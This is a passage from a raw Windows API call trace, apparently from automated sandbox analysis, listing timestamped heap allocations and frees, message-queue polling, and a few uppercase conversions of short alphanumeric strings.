(in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0222.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0222.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0222.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.174] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0222.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0222.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0222.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0222.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0222.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0222.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0222.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0222.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0222.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0222.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0222.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0222.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0222.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0222.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0222.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0222.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0222.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0222.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0222.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0222.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0222.178] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0222.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0222.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0222.179] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0222.179] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0222.179] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0222.179] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0222.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0222.179] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab938 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d70 [0222.180] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0222.180] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0222.180] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0222.180] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d70 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0222.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0222.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0222.182] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0222.182] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0222.182] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8d8 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73fb0 [0222.182] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0222.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.182] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0222.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0222.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73fb0 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0222.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.184] PeekMessageW (in: lpMsg=0x8cf3b8, 